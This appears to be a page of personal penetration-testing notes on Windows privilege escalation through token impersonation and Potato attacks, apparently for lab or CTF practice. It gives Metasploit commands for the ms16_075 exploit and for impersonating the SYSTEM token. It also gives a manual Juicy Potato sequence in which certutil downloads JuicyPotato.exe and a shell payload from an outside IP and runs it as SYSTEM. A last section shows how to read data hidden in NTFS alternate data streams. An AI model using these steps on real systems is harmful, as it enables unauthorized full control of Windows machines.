Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

Potato Attack Overview

Escalation via Potato Attack

After getting a meterpreter shell

background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

Inside of new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

Resources

JuicyPotato - HackTricksbook.hacktricks.xyz

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

dir /r
more hm.txt:root.txt:$DATA

Introduction to Alternate Data Streams | Malwarebytes LabsMalwarebytes

PreviousWindows Subsystem for Linux NextRunAs

Last updated 1 year ago

Was this helpful?